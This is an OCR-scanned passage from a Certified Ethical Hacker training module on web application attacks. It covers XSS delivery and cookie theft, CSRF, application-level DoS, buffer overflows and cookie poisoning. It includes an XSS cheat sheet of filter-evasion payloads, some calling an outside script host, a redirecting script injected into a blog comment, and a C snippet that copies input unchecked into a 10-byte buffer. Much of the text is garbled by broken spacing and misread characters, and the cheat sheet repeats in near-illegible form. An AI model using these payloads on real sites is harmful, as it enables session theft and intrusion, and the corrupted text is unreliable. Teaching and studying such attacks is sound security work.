U s e r's M a lic io u s A tt a c k e r 's
S e rv e r
B ro w s e r S c r ip t S e rv e r
< A H R E F=h t t p : / / ju g g y b o y b a n k . c a n /
a m a lic io u s lin k r e g i s t r a t i o n . c x j i ? c l i e n t p r o f ile = < S C R IP T >

m a lic io u s c o d e < /S C R IP T » C lic k h e r e < /A >
Mi
th e URL t o u s e r a nd c o n v in c e u s e r to c lic k on i t
_ R e q u e st th e page
o ......................!•
Page w it h m a lic io u s s c rip t
— Run
© .......
X S S E x a m p le : A tta c k v ia E m a il
The fo llo w in g are th e steps in v o lv e d in an XSS a tta c k via e m a il:
1. C o n s tru c t a m a lic io u s link:
<AHREF=h t t p : / / ju g g y b o y b a n k . c o m / r e g is t r a t io n . c g i? c lie n t p r o f ile = < S C R I P T >

m a lic io u s c o d e < /S C R IP T > > C lic k h e re < /A >
2. Email th e URL to th e user and c o n v in c e th e user to click on it.
3. User re q u e sts th e page.
4. L e g itim a te se rve r sends a response page w ith m a licio u s scrip t.
5. M a lic io u s s c rip t runs on th e user's b ro w se r.

X S S E x a m p le : S te a lin g U s e rs '
C E H
C o o k ie s

H ost a page w it h m a lic io u s s c rip t
^ ^ vkV
i eieww th e page h o s te d Dy
by th e a tta c k e r
H TM L c o n ta in in g m a lic io u s s c r i p t !
»...........................‫ ז‬......................© - !
Run
@
C o lle c t u s e r's c o o k ie s
R e d ire c t to a tta c k e r's s e rv e r

< .............................. (
Send th e re q u e s t w it h th e u s e r's c o okie s
X S S E x a m p le : S te a lin g U s e rs * C o o k ie s
To steal th e user's cookies w ith th e he lp o f an XSS a tta ck, th e a tta c k e r looks fo r XSS
vu n e ra b ilitie s and th e n insta lls a c o o k ie s te a le r (co o kie logger).
The fo llo w in g are th e v a rio u s steps in v o lv e d in ste a lin g user's cookies w ith th e help o f XSS
a tta c k :
1. A tta c k e r in itia lly hosts a page w ith m a licio u s s c rip t
2. The user visits th e page h o ste d by a tta c k e r
3. The a tta c k e r's se rve r sends th e response as HTM L c o n ta in in g m a licio u s s c rip t
4. The user's b ro w s e r runs th e HTM L m a licio u s s c rip t
5. The C ookie Logger p re s e n t in th e m a licio u s s c rip t co lle cts user's cookies
6. The m a lic io u s s c rip t re d ire c ts th e user to a tta c k e r's server
7. The u ser's b ro w s e r sends th e re q u e s t w ith th e user's cookies

XSS E x a m p le : S e n d in g a n
C E H
U n a u th o r iz e d R e q u e s t
A tt a c k e r 's
S e rv e r
C o n s tru c t a m a lic io u s lin k
Email th e URL t d u ser and c o n v in c e u s e r t o c lic k on i t

.......... *
R e q u e s t th e page II
Page w it h m a lic io u s s c rip t
Run
A n a u th o riz e d re q u e s t
X S S E x a m p le : S e n d in g a n U n a u th o r iz e d R e q u e s t
Using an XSS a tta c k , th e a tta c k e r can also send an u n a u th o riz e d re q u e st. The
fo llo w in g are th e steps in v o lv e d in an XSS a tta c k in te n d e d to send an u n a u th o riz e d re q u e s t:
1. A tta c k e r c o n s tru c ts a m a lic io u s lin k
2. Sends an e m ail c o n ta in in g th e URL to user and convinces user to click on it
3. The u ser's b ro w s e r sends a re q u e s t to th e a tta c k e r's se rve r fo r th e page
4. The a tta c k e r's se rve r in response to th e user's re q u e s t sends th e page w ith m a licio u s
s c rip t
5. The u ser's b ro w s e r runs th e m a licio u s s c rip t
6. The m a lic io u s s c rip t sends an a u th o riz e d re q u e s t

X S S A t t a c k i n B lo g P o s t in g C E H
4 a ►
Malicious code
<script>onload=
window.Iocation=
' http://www.juggYboy.com'
</script>
is injecting the blog post
U s e r r e d ir e c t e d t o a m a lic io u s
w e b s it e ju g g y b o y .c o m
W eb A p p lic a tio n
M a lic io u s W eb site
1 3 5 X S S A tta c k in a B lo g P o s tin g
The fo llo w in g dia g ra m d e p ic ts th e XSS a tta c k in a blog p o stin g :
M alicio u s c o d e
<script>onload=
A tta c k e r adds a m alicious s c rip t in w in d o w . location=
th e c o m m e n t fie ld o f blog post 'h ttp ://w w w .ju g g y b c y .c o m '
</script>
is in je c tin g t h e blog post
C o m m e n t w ith
m a lic io u s lin k is
s to re d on th e server
U s e r r e d ir e c t e d t o a m a li c i o u s
w e b s it e ju g g y b o y .c o m
D atabase Server W e b A p p lica tio n

M aliciou s W e b s ite
FIGURE 13.20: XSS Attack in a Blog Posting

X S S A t t a c k in C o m m e n t F ie ld C E H
oooo
U s e r v is it s th e
I Tech Post
w e b s it e Face book acquires file-sharing service
New York-based start-up that lets users privately
and sporadicaty share fles through a drag-and-
drop interface with additional options----------
C om m ent
Jason, I love your blog post!
- Mark (mark@miccasoft.com)
Leave y o u r c o m m en t
M alicious code
< s c r ip t » a le r t ( " H e ll
o Wor I d ") < / sc r ip t>
is in je ctin g th e blog post
H I
‫ן‬ H^lnVWnild
C o m m e n t w it h T h e a le r t p o p s u p as s o o n
m a lic io u s lin k is a s t h e w e b p a g e is lo a d e d I <*......i
s to r e d o n th e s e r v e r
D a ta b a s e S e rv e r W e b A p p lic a t io n P o p u p W in d o w
J X S S A tta c k in a C o m m e n t F ie ld
■ ....
M a n y In te rn e t w e b p ro g ra m s use HTM L pages th a t d y n a m ic a lly a ccept data fro m
d iffe r e n t sources. The data in th e HTM L pages can be d y n a m ic a lly change d a cco rd in g to th e
re q u e s t. A tta c k e rs use th e HTM L w e b page's tags to m a n ip u la te th e data and to launch th e
a tta c k by chan gin g th e c o m m e n ts fe a tu re w ith a m a licio u s s c rip t. W h e n th e ta rg e t sees th e
c o m m e n t and a c tiva te s it, th e n th e m a lic io u s s c rip t is e xe cu te d on th e ta rg e t's b ro w s e r,
in itia tin g m a lic io u s p e rfo rm a n c e s .

X S S C h e a t S h e e t H C E H
U ilifM itkiul Mm few
E m b e d d ed carriage r e tu rn : <1MG IM G Dynsrc: <1MG

XSS lo cato r: ‫!; ״‬-‫< ־ ־‬XSS>=&{()}
SRC‫ ־־‬jav& #xO D ;ascript :ale rtfX S S ‫> ״;(־‬ DYNSRC‫ ״ ־‬ja v a s a ip t alertC XSS‫> ״(־‬
N o rm a l XSS JavaScript in je ctio n : <SCRIPT NuN Chars: p e ri -e 'p rin t "<1MG IM G lo w src:<IM G
SRC=h ttp ://h a x k e rs .o rg /x s s .js x /S C R IP T > SRC=java\Oscri p t : ale rt(\" X S S \" )> " ;'> o u t DYNSRC‫ " ־‬Ja va sa lp t: ale r t f XSS‫>־(־‬
Im age XSS: <IM G SRC=‫־־‬ja va scrip t:alert('X S S ‫>";)־‬ N o n -a lp h a-n o n -d ig it XSS: <SCR1PT/XSS IM G lo w src:<IM G
SRC=" h ttp ^ /h a .d c e rs ^ fg /x s s .js " x /S C R !P T > LOWSRC=" ja vascript :alert('X SS')">
N o q u o te s a n d no sem icolon: <IM G
N o n -a lp h a-n o n -d ig it p a rt 2 XSS: <BODY BGSOUND:<BGSOUND
SR C =javascript:alert(‫־‬XSS')> o n lo ad ! # $ % & ( ) - + 1 / ] @ ?;:,.‫\ ־‬K '= a le rt< ‫״‬XSS‫>)״‬ SRC‫ ״ ־‬ja v a s a lp t :ale rt('X SS '(;‫< ־׳‬
Case in sensitive XSS atta c k ve cto r: <IM G
Extran eo u s o p e n brackets: LAYER:<LAYER SRC=
SRC=JaVaScRIPt:alert('XSS')> «SC R JPT>alert("X SS") ; / / « / SCR1PT> " h t t p : //h a x k e r s .o r g / script le th tm T x /L A Y E R >
HTM L e n title s : <1MG

N o d osing script tags: <SCRIPT STYLE s h e e t: <LINK REL="stylesheet ‫־‬
SRC =javascr ip t: ale rt (& q u o t ;XSS&q u o t ; )> HREF‫ ־'־‬ja v a s a lp t :ale r t( ,XSS*(;‫< ״‬
SRC=h ttp ://h a.ck ers .o rg /x ss .js ? 
Grave accent o bfuscation: < IM G
Pro to co l re s o lu tio n in script tags: <SCRIPT Local htcfile:<XSSSTYLE‫" ־‬behavk>r:
SRC= ja vascript :a le rt(" RSnake says, 'X S S 'T > SRC‫־‬/ / h a x k e rs .o rg /.j> urH xssJttc);">
M a lfo rm e d IM G tags:<IM G
Half o p e n H TM L/JavaS cript XSS ve cto r: < IM G VB script in an Im ag e: <IM G
‫ " ״־־‬x S C R IP T > a le r tf XSS" )</SCRIPT>" > SRC=‫־־‬ja vascript :alert('X SS')" SRC*‫־‬v b s a ip t :m sgbox(‫״‬XSS")’>
E m b e d d ed ta b : < IM G SRC«"Jav
D ouble o p e n angle b rackets: < lfram e
ascrip t:aiert('X S S ');H> M o ch a: <IM G SRC‫" ־‬H vescript:[code]">
src‫ ־‬h t tp : //h a .c k e rs.o rg /scrip tlet.h tm i <
E m b e d d ed en c o d ed ta b : < IM G
XSS w ith no single q u o te s o r d o u ble q uotes or
SRC‫ ־ ־‬ja v & # x 0 9 ;a s c rlp t:ale rt ( ,XSS‘);" > US-ASCII encoding: is a ip tu a le rt(E X S S E )i/s a ip tu
sem icolons: SCRIPT>alert (/X S S /s o u rc e K/SCRIPT>
E m b e d d ed ta b : < IM G SRC="jav M ETA :<M ETA H T T P -E Q U fV -"rafras h "

as crip t:aiert('X S S ');"> Escaping JavaScript escapes: \ ‫;״‬a le rt('X S S ');//
C O N T EN T ="0;u H =javascrip t:alert(‫־‬XSS‫>”;)׳‬
E m b e d d ed en c o d ed ta b : < IM G End t it le tag: TABLE:<TABLE

SRC‫) ״ ־‬a v & # x 0 9 ;a s a lp t:ale rt ( ,XSS‫> ";)־‬ </T T T lExSC R JPT >aiert(“XSS“);</SCRlPT> BACKGROUN D‫־־־‬ja vascrip t: alert( ‫־‬XSS‫>״(־‬
Em b e d ed n e w lin e : < IM G IN PU T im age :<IN PUT TYPE=" IM AGE" T D :<T A B L E xT D

SR C ="jav& #xO A ;ascript:alert('XSS');"> SRC*" Javascri p t :ale r t (' XSS');‫> ״‬ BACKGROUN D‫ ״ ־‬ja v a s a lp t :alert(*XSS‫>״(־‬
C o p y r ig h t © b y E & C a u ic f l . A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
XSS C h e a t S h e e t
Em b ed d ed ca rria g e r e t u r n : ‫ י‬.IM G
XSS lo c ato r ‫ ' ־‬. ‫ ׳‬- ‫ < ־‬X S S > = * { () }
S R C = *jfg ^ k O O .a s c n p t a t e f t f X S S ' ^
►normal XSS ; a v a S a ip t in a c tio n <SCRIFT M * O m n (K f l.-e *print ‫* < ־‬A G •M G ( S K iC ^ c lM G

SR C =nttp J f ha t t e r s o rg /c s s js x /S C R IP T > SRC-yn v n \O s c n p ta *e rtf\*X S S V > out 0vNs*c‫־־‬a»ist1«jusdi“ st ‫׳‬
W:m‫־‬a!pr»»-n&n‫־‬Ctg:t XSS <SCR1FT/XSS M G Ifw V C < M 6
‫*״‬p « * 6 ‫״*■־‬ S H C : * n tt p y /h a ckers org/KSS.js‫־‬x V S C R IF T >
Mo qiK rtrc • 4 ‫ ח‬m je m ic o to •: <1MG p v t 2 XSS <SOOY SG SOUND.-SGSO L'N D

) • ‫ ■ *־־־‬- ? * I / - X S S ‫>>״‬ S^ WOBSaRSJUSCft*” >‫»־‬
Case *nsensitrve XSS a t t a o v e c to r < « * G LAVER •LA YER SHC=
Evtran eo u s open brackets
< <SCRIFT>«»eft ( TCSS‫״‬y / « / 5 C W F T > * H tt p y /n a .A e fs .o r g /s c r1p tie t-M m J ‫ ״‬x / lA Y E R >
H T M L e n trtie s * IM G N o O a s u ^ senpt f g z . < S O U F T S T Y U sh e et: <UNK R E U - g T f e t t c g r

SR C = attp y /aa .c iL ers .o rg /c ss .js *«:*> HREF=‫־‬ttW650£lJJ1>fOiXSS‫>־ ־‬
G ra v e accent o d f ascatioa: < IM G Protocol reso lu tio n m senpt tag s <SCRIPT lo c a l M c .fo e <XSS S T 1 U = '» e M w o r
S R C 0 & ‫ ־‬8 ‫ מ‬6 8 ‫ « * « נ‬6 0 1 ‫ ־‬S & C T V TC SS")'>
S R C =//fca.clters.o rg /.j>
M a rfo rm e o IM G tag s ■:IMG H a *f o p e • K T M t/ja v a S c n p t X 5 ve cto r d M G VB script in an im a g e . <JMG

‫ * * ׳‬x S C R IP T > a J e rt{ ‫ ־‬XSS‫<> ־‬/SCRIPT>‫> ״‬ S R C = V tec rip t:m s g tX )» cf*X S S 7‫> ׳‬
S R C = *|» v « 5 q n jt^ ie r^ X S S 7 '
Em o ed d ed t a t r <JMG S R C = *jav Dootrte open an g le D radcets
w ^ t a k r ^ TCSS'J;‫> ״‬ M o c M <JMG SR C =‘ 1nrescnpt:JcodeI*>
gty^tittpy/ha.cfcers.org/sertpttet.fttmi / > U S-A SO I encoding g O T p y a > m lE X S S E fJ x z > p lv
semacoftoaa: S C R *T > « le rt(/X S S /-S 0«1r c e > < /S a 1 F T >
Em b ed d ed t a t <1MG SRC=‫ ־‬ja y M E T A < M E T A K T T F -E Q IW r-re fie s a *

s‫״‬ss!‫׳‬sji‫«־‬s'>:‫>־‬ Escaping J r a S c n p t escapes W a t e r * ‫־‬x s s y /
C 0 t a e m = ’ 0 : m t = f f r K a T f t : * e r t fx S S V >
E m b ed d ed encoded t a d : « IM G Ena t it le ta g TABLE cTABLE

S R C = '0 x ^ a c O 9 ;a s c n p t n »e rt(‫־‬XSS‫>' ; )־‬
< /T T m x s c R ^ > a ie r t(* x s s * W s a a P T > bacxg r o u n o = ^^ t y i p t t £ r t j r c s s f >
' fflww‫**< ‘•״•״‬G IN PU T ■ m n ■ J M F V T T Y P E = *IN » G E ' T D x T A U fx T O

S *C ‫ ! ־ ־‬w |M 1 « f lA » n p t » l« r t l T C S S ) .‫> ־‬
' i M K r a t f ,^‫>״‬ ia c k g r o u m >=‫* ־‬a va sc rw t a*ertfTCSS7‫> ־‬
FIGURE 13.22: XSS Cheat Sheet

C ro ss-S ite R e q u e s t F o rg e ry (C S R F)
E l\
A tta c k c
(*rtifxd 1 lt»K4l IlMtm
J C ro s s -S ite R e q u e s t F o rg e ry (CSRF) a tta c k s e x p lo it w e b p a g e v u ln e r a b ilit ie s t h a t a llo w a n a tta c k e r t o fo r c e an

u n s u s p e c tin g u s e r's b r o w s e r t o s e n d m a lic io u s r e q u e s ts t h e y d id n o t in te n d
J T h e v ic t im u s e r h o ld s a n a c tiv e s e s s io n w it h a t r u s te d s ite a n d s im u lta n e o u s ly v is its a m a lic io u s s ite , w h ic h

in je c ts a n HTTP r e q u e s t f o r t h e t r u s te d s ite in t o t h e v ic tim u s e r's s e s s io n , c o m p r o m is in g its in t e g r it y
fc
U ser T ru s te d W e b s ite M a lic io u s W e b s ite
Logs in to th e tru s te d s ite a n d

> ___
c rea ite sa n e w s ! :sion
S to re s th e s e s s io n id e n t f ie r f o r t h e ‫י‬
se s s io n in a c o o k ie in th e w e b b ro w s e r
...... 1 ©
...
S e n d s a re q u e s t f r o m th e u se r's
! u sin g his se s s io n c o o k ie
© 41!
C r o s s - s ite R e q u e s t F o r g e r y (C S R F ) A tta c k
Cross-site re q u e s t fo rg e ry is also kn o w n as a o n e -c lick a tta ck. CSRF occurs w h e n a

user's w e b b ro w s e r is in s tru c te d to send a re q u e st to th e ve n e ra b le w e b s ite th ro u g h a
m a licio u s w e b page. CSRF v u ln e ra b ilitie s are ve ry c o m m o n ly fo u n d on fin a n c ia l-re la te d
w ebsites. C o rp o ra te in tra n e ts usually c a n 't be accessed by th e o u ts id e a tta cke rs so CSRF is one
o f th e sources to e n te r in to th e n e tw o rk . The lack o f th e w e b a p p lic a tio n to d iffe re n tia te a
re q u e s t d o n e by m alicious code fro m a ge n u in e re q u e st exposes it to CSRF attack.
Cross-Site re q u e s t fo rg e ry (CSRF) attacks e x p lo it w e b page v u ln e ra b ilitie s th a t a llo w an a tta c k e r

to fo rc e an u nsuspe cting user's b ro w s e r to send m alicious requests th e y did n o t in te n d . The
v ic tim user holds an a c tiv e session w ith a tru s te d site and sim u lta n e o u s ly visits a m alicious site,
w h ic h injects an HTTP re q u e s t fo r th e tru s te d site in to th e v ic tim use r's session, co m p ro m is in g
its in te g rity .

Ethical Hacking a n d C o u n te rm e a s u re s Exam 312-50 C ertified Ethical H acker
H acking W eb A p p lic a tio n s
H o w C S R F A tta c k s W o r k
In a c r o s s - s ite r e q u e s t f o r g e r y a tta c k , t h e a t t a c k e r w a i t s f o r t h e u s e r t o c o n n e c t t o t h e
t r u s t e d s e r v e r a n d t h e n t r ic k s t h e u s e r t o click o n a m a lic io u s lin k c o n t a i n i n g a r b i t r a r y co d e .
W h e n t h e u s e r clicks o n t h e m a lic io u s lin k , t h e a r b i t r a r y c o d e g e ts e x e c u t e d o n t h e t r u s t e d
s e rv e r. T h e f o l l o w i n g d ia g r a m e x p la in s t h e s t e p - b y - s t e p p ro c e s s o f a CSRF a tta c k :
M o d u le 13 P ag e 1797 Ethical H acking a n d C o u n te rm e a s u re s C opyright © by EC-C0UnCil

All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
W e b A p p lic a t io n D e n ia l- o f - S e r v ic e
(D o S ) A t t a c k
CEH
Attackers exhaust available server resources by W hy Are Applications Vulnerable?

sending hundreds of resource-intensive • Reasonable Use of Expectations
requests, such as pulling out large image files
‫ג‬ Application Environment Bottlenecks
or requesting dynamic pages that require
expensive search operations on the backend - Implementation Flaws
database servers - Poor Data Validation
W e b S e rv e r R e s o u rc e C o n s u m p tio n W e b S e r v ic e s U n a v a ila b ility
•
Targets Application-level DoS attacks emulate the
i ‫ג‬ CPU, Memory, and Sockets same request syntax and network-level
B O B traffic characteristics as that of the
: - Disk Bandwidth
: legitimate clients, which makes it
i - Database Bandwidth B O B undetectable by existing DoS protection :
: - Worker Processes measures :
Copyright © by EG-G0llial. All Rights Reserved. Reproduction is Strictly Prohibited.
W e b A p p lic a tio n D e n ia l‫־‬o f‫־‬S e r v ic e (D o S ) A tta c k

————‫י‬
______ D e n ia l- o f- s e r v ic e a tta c k s happen when th e le g itim a te users a re p re v e n te d fro m
p e rfo rm in g a d e s ir e d ta s k o r o p e r a t i o n . A t t a c k e r s e x h a u s t a v a ila b le s e r v e r r e s o u r c e s by
s e n d in g h u n d r e d s o f r e s o u r c e - i n t e n s iv e r e q u e s ts , such as p u llin g o u t la rg e im a g e file s o r
r e q u e s t i n g d y n a m i c pages t h a t r e q u i r e e x p e n s iv e s e a rc h o p e r a t i o n s o n t h e b a c k e n d d a ta b a s e
se rv e rs .
T h e f o l l o w i n g issues m a k e t h e w e b a p p li c a t i o n s v u ln e r a b l e :
© R e a s o n a b le Use o f E x p e c t a t i o n s
© A p p l i c a t i o n E n v i r o n m e n t B o ttle n e c k s
© I m p l e m e n t a t i o n Flaws
© P o o r D ata V a l id a t i o n
A p p lic a tio n -le v e l DoS a tta c k s e m u la te th e same r e q u e s t s y n ta x a n d n e tw o rk -le v e l tra ffic

c h a r a c te r is t ic s as t h a t o f t h e l e g i t i m a t e c lie n ts , w h i c h m a k e s it u n d e t e c t a b l e b y e x is t in g DoS
p r o t e c t i o n m e a s u r e s . In w e b a p p li c a t i o n d e n ia l- o f- s e r v ic e a t t a c k t h e a t t a c k e r t a r g e t s a n d tr ie s
t o e x h a u s t CPU, m e m o r y , S o ckets, d isk b a n d w i d t h , d a ta b a s e b a n d w i d t h , a n d w o r k e r p ro cesse s.
S o m e o f t h e c o m m o n w a y s t o p e r f o r m a w e b a p p l i c a t i o n DoS a t t a c k a re :
■ © B a n d w i d t h c o n s u m p t i o n - f l o o d i n g a n e t w o r k w i t h d a ta

D e n ia l- o f - S e r v ic e (D o S ) E x a m p le s CEH
User The a tta c k e r c o u ld c re a te a p ro g ra m t h a t s u b m its th e re g is tra tio n fo rm s

Registration DoS re p e a te d ly , a d d in g a la rg e n u m b e r o f s p u rio u s users t o th e a p p lic a tio n
The a tta c k e r m a y o v e rlo a d th e lo g in p rocess by c o n tin u a lly s e nd ing lo g in

Login re q u e s ts th a t re q u ire th e p r e s e n ta tio n t ie r t o access th e a u th e n tic a tio n
A ttacks m e c h a n is m , re n d e rin g it u n a v a ila b le o r u n r e a s o n a b ly s lo w t o re s p o n d
User I f a p p lic a tio n s ta te s w h ic h p a rt o f th e u s e r n a m e /p a s s w o rd p a ir is in c o rre c t,

an a tta c k e r c a n a u to m a te th e pro c e s s o f try in g c o m m o n u s e r n a m e s f r o m a
Enumeration
d ic tio n a r y file t o e n u m e ra te th e users o f th e a p p lic a tio n
The a tta c k e r m a y e n u m e ra te user n a m es th ro u g h a n o th e r v u ln e ra b ility in

th e a p p lic a tio n a n d th e n a tte m p t t o a u th e n tic a te t o th e s ite using v a lid
A cco u n t Lock u s e r n a m e s a n d in c o rr e c t p a s s w o rd s , w h ic h w ill lo c k o u t th e a c c o u n ts a fte r
Out A tta c ks th e s p e c ifie d n u m b e r o f fa ile d a tte m p ts . A t th is p o in t le g itim a te users w ill
n o t be ab le t o use th e s ite
Copyright © by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited.
D e n ia l‫־‬o f‫־‬S e r v ic e (D o S ) E x a m p le
M o s t w e b a p p l i c a t i o n s a r e d e s i g n e d t o s e r v e o r w i t h s t a n d w i t h l i m i t e d r e q u e s t s . If t h e
l i m i t is e x c e e d e d , t h e w e b a p p l i c a t i o n m a y f a i l t h e s e r v e r t h e a d d i t i o n a l r e q u e s t s . A t t a c k e r s u se
a d v a n ta g e to la u n c h d e n ia l-o f-s e rv ic e a tta c k s o n th e w e b a p p lic a tio n s . A tta c k e rs se n d to o m a n y
r e q u e s ts t o th e w e b a p p lic a tio n u n til it g e ts e x h a u s te d . O n c e th e w e b a p p lic a tio n re c e iv e s
e n o u g h r e q u e s t s , i t s t o p s r e s p o n d i n g t o o t h e r r e q u e s t t h o u g h i t is s e n t b y a n a u t h o r i z e d u s e r .
T h is is b e c a u s e t h e a t t a c k e r o v e r r i d e s t h e w e b a p p l i c a t i o n w i t h f a l s e r e q u e s t s . V a r i o u s w e b
a p p l i c a t i o n DoS a t t a c k s i n c l u d e :
6 User R e g is tra tio n DoS: The a tta c k e r c o u ld cre a te a p ro g ra m th a t s u b m its th e

re g is tra tio n fo rm s re p e a te d ly a d d in g a la rg e num ber of s p u rio u s u sers to th e
a p p lic a tio n .
© L o g in A tta c k s : The l o g in p ro ce d u re is o v e rlo a d e d by th e a tta c k e r by re p e a te d ly

t r a n s f e r r i n g l o g in r e q u e s t s t h a t n e e d t h e p r e s e n t a t i o n t i e r t o a d m i t t h e r e q u e s t a n d
access th e v e rific a tio n in s tru c tio n s . W hen th e re q u e sts a re o v e rlo a d e d , th e n th e
p r o c e s s b e c o m e s s l o w o r u n a v a i l a b l e t o t h e g e n u i n e u s e rs .
Q User E n u m e ra tio n : W h e n th e a p p lic a tio n re s p o n d s t o a n y us e r a u th e n tic a tio n p ro ce ss

w it h t h e e r r o r m e ssa g e d e c la rin g th e a rea o f in c o r r e c t in fo r m a tio n , th e n th e a tta c k e r
c a n e a s i ly m a n i p u l a t e t h e p r o c e d u r e b y b r u t e f o r c i n g t h e c o m m o n u s e r n a m e s f r o m a
d ic tio n a r y file t o e s tim a t e th e u sers o f t h e a p p lic a tio n .

B u ffer O v erflo w A tta ck s CEH
B u ffe r o v e r f lo w o c c u rs w h e n a n a p p lic a tio n

w r i t e s m o r e d a ta t o a b lo c k o f m e m o r y , o r
b u ffe r , t h a n t h e b u f fe r is a llo c a te d t o h o ld
A b u f fe r o v e r f lo w a tta c k a llo w s a n a tta c k e r t o

m o d if y t h e t a r g e t p ro c e s s 's a d d re s s s p a c e in
o r d e r t o c o n t r o l t h e p ro c e s s e x e c u tio n , c ra s h
t h e p ro c e s s , a n d m o d if y in te r n a l v a ria b le s
V
A tta c k e rs m o d if y f u n c tio n p o in te r s u s e d b y t h e Vulnerable Code

a p p lic a tio n t o d ir e c t p r o g r a m e x e c u tio n in t main(int argc, char *argv[]) {
t h r o u g h a ju m p o r c a ll in s tr u c t io n a n d p o in ts it char *dest_buffer;
t o a lo c a tio n in t h e m e m o r y c o n ta in in g dest_buffer = (char *) malloc(10);
m a lic io u s c o d e s i f (NULL = dest_buffer)
return -1;
i f (argc > 1) {
strcpy(dest_buffer, argv[1 ]);
printf("The f ir s t oomnand-line
argument is %s.\n‫ ״‬, dest_buffer); )
else { prin tf ("No command-line
argument was given. \n"); }
f ree(dest_buf fer);
return 0; }
N o te : For c o m p le te coverage o f b u ffe r o v e rflo w conce pts and techniques, refe r to M o d u le 18: B u ffer O v e rflo w
B u ffe r O v e r flo w A tta c k s
A b u ff e r has a s p e c ifie d d a ta s to ra g e c a p a c ity , a n d if th e c o u n t e x c e e d s th e o rig in a l,

th e b u ffe r o v e rflo w s ; th is m e a n s t h a t b u ffe r o v e r f lo w o cc u rs w h e n an a p p lic a tio n w rite s m o r e
d a t a t o a b l o c k o f m e m o r y , o r b u f f e r , t h a n t h e b u f f e r is a l l o c a t e d t o h o l d . T y p i c a l l y , b u f f e r s a r e
d e v e lo p e d t o m a in ta in fin ite d a ta ; a d d itio n a l in f o r m a t i o n can be d ir e c te d w h e r e v e r it n e e d s t o
go. H o w e ve r, e x tra in fo rm a tio n may o v e rflo w in to n e ig h b o rin g b u ffe rs , d e s tro y in g or
o v e r w r i t i n g le g a l d a t a .
A r b itr a r y C ode
A b u f f e r o v e r f lo w a tta c k a llo w s an a tt a c k e r t o m o d i f y th e t a r g e t p ro c e s s 's a d d re s s

space in o rd e r to c o n tro l th e p ro ce ss e x e c u tio n , crash th e process, and m o d ify
in te rn a l v a ria b le s . W hen a b u ffe r o v e rflo w s , th e e x e c u tio n s ta c k of a web a p p lic a tio n is
d a m a g e d . A n a tt a c k e r can t h e n se n d s p e c ia lly c r a fte d in p u t t o th e w e b a p p lic a tio n , so t h a t th e
w e b a p p lic a tio n e x e c u te s th e a r b it r a r y c o d e , a llo w in g th e a tt a c k e r t o s u c c e s s fu lly ta k e o v e r th e
m a c h in e . A tta c k e rs m o d ify fu n c tio n p o in te rs used by th e a p p lic a tio n to re d ire c t th e p ro g ra m
e x e c u t i o n t h r o u g h a j u m p o r c a ll i n s t r u c t i o n t o a l o c a t i o n in t h e m e m o r y c o n t a i n i n g m a l i c i o u s
c o d e . B u ffe r o v e r f lo w s a re n o t easy t o d is c o v e r, a n d e v e n u p o n d is c o v e ry th e y a re d iffic u lt t o
e x p lo it. H o w e ve r, th e a tta c k e r w h o re c o g n iz e s a p o te n tia l b u ffe r o v e rflo w can access a
s ta g g e r in g a rr a y o f p r o d u c ts a n d c o m p o n e n ts .

I
Cookie/Session Poisoning CEH
(•rtifWd I itk itjl Nm Im
Cookies are used to m aintain session state in the otherw ise stateless HTTP protocol
Modify the Inject the Rewriting

Cookie Content Malicious Content the Session Data
C o o k ie p o i s o n i n g a t t a c k s P o is o n in g a l lo w s a n A p ro x y ca n be used fo r
in v o lv e t h e m o d i f i c a t i o n a t ta c k e r t o in je c t t h e r e w r i t i n g t h e s e s s io n d a t a ,
o f t h e c o n t e n t s o f a c o o k ie m a li c io u s c o n t e n t , m o d i f y d i s p la y i n g t h e c o o k i e d a t a ,
( p e r s o n a l in f o r m a t io n s to re d t h e u s e r 's o n l i n e a n d / o r s p e c ify in g a n e w u s e r
in a w e b u s e r 's c o m p u t e r ) in e x p e r ie n c e , a n d o b t a i n t h e ID o r o t h e r s e s s io n i d e n t i f i e r s
o r d e r t o b y p a s s s e c u r it y u n a u th o riz e d in fo r m a tio n in t h e c o o k i e
m e c h a n is m s A
C o o k ie /S e s s io n P o is o n in g
C o o k ie s f r e q u e n t l y t r a n s m i t s e n s itiv e c r e d e n t i a l s a n d can be m o d if ie d w i t h ease t o

e s c a la te access o r a s s u m e t h e i d e n t i t y o f a n o t h e r user.
C o o k ie s a re used t o m a i n t a i n a session s ta te in t h e o t h e r w i s e s ta te le s s HTTP p r o t o c o l . Sessions

a re i n t e n d e d t o be u n i q u e l y t i e d t o t h e in d iv id u a l accessing t h e w e b a p p li c a t i o n . P o is o n in g o f
c o o k ie s a n d session i n f o r m a t i o n can a l l o w an a t t a c k e r t o i n j e c t m a lic io u s c o n t e n t o r o t h e r w i s e
m o d i f y t h e u ser's o n - li n e e x p e r ie n c e a n d o b t a i n u n a u t h o r i z e d i n f o r m a t i o n .
C o o k ie s can c o n t a i n s e s s io n - s p e c ific d a ta such as u s e r IDs, p a s s w o r d s , a c c o u n t n u m b e r s , links

t o s h o p p i n g c a r t c o n t e n t s , s u p p lie d p r i v a t e i n f o r m a t i o n , a n d session IDs. C o o k ie s e x is t as file s
s t o r e d in t h e c l i e n t c o m p u t e r 's m e m o r y o r h a rd disk. By m o d i f y i n g t h e d a ta in t h e c o o k ie , an
a t t a c k e r can o f t e n g ain e s c a la t e d access o r m a lic io u s ly a f f e c t t h e u ser's session. M a n y sites
o f f e r t h e a b i l it y t o " R e m e m b e r m e ? " a n d s to r e t h e u ser's i n f o r m a t i o n in a c o o k ie , so he o r she
d o e s n o t h a ve t o r e - e n t e r t h e d a ta w i t h e v e r y v is it t o t h e site. A n y p r i v a t e i n f o r m a t i o n e n t e r e d
is s t o r e d in a c o o k ie . In an a t t e m p t t o p r o t e c t c o o k ie s , site d e v e lo p e r s o f t e n e n c o d e t h e
c o o k ie s . Easily r e v e r s ib le e n c o d i n g m e t h o d s such as B ase64 a nd ROT13 ( r o t a t i n g t h e l e t t e r s o f
t h e a lp h a b e t 13 c h a r a c te r s ) g iv e m a n y w h o v i e w c o o k ie s a fa ls e se nse o f s e c u r ity .

How Cookie Poisoning Works
GET /store/buy .aspx?checkout=yes HTTP/1.0 H ost www.juggyshop.com

Accept •/* Referrer: http://www.juggyshop.com/showprods.aspxCookie:
SESSIONID=325896ASDD23SA3587; BasketSize=3; lteml=1258;
. Item2=2658; Item3=6652; TotalPrice=11568;
W eb server replies w ith requested

page and sets a cookie on th e user's brow se r
User b row ses a w e b page
GET /stor^buy.aspx?checkout*yes HTTP/1.0 H ost

